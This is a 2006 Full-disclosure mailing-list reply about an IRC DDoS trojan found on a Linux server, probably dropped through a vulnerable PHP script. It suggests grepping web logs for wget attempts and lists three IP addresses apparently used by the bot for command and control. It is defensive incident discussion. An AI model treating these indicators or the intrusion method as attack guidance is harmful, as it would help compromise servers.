[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Trojan found on Linux server

To: Niek <niek@xxxxxxxxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Trojan found on Linux server
From: "Gaddis, Jeremy L." <jeremy@xxxxxxxxxxxx>
Date: Mon, 02 Jan 2006 16:43:20 -0500

Niek wrote:

This is a much seen thing these days. Your customer probably got attacked by an insecure php script (cacti/xmlphp/awstats/ect). Check your apache logs. if I grep my logs for wget, I see tons of attempts.

Roger that. It wasn't important enough to us to pursue. I just recently signed on with this customer and was in the process of moving their websites over to new, freshly installed servers from the Red Hat Linux 9 boxes they were running on. Since we're about to rebuild the server anyways, it wasn't worth the time to pursue.

The trojan is a an irc drone, listinging for ddos commands/ect.

Yep, when running "strings" on it I noticed a few IP addresses (219.133.46.212, 61.211.239.84, 64.239.9.236) in there as well as commands indicative of IRC ("NOTICE", "NICK", "PRIVMSG", etc.)

-j

--
Jeremy L. Gaddis, GCWN, Linux+, Network+
LinuxWiz Consulting
http://www.linuxwiz.net/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Trojan found on Linux server
  - From: Morning Wood

References:
- [Full-disclosure] Trojan found on Linux server
  - From: Gaddis, Jeremy L.
- Re: [Full-disclosure] Trojan found on Linux server
  - From: Niek

Prev by Date: Re: [Full-disclosure] Trojan found on Linux server
Next by Date: Re: [Full-disclosure] Trojan found on Linux server
Previous by thread: Re: [Full-disclosure] Trojan found on Linux server
Next by thread: Re: [Full-disclosure] Trojan found on Linux server
Index(es):
- Date
- Thread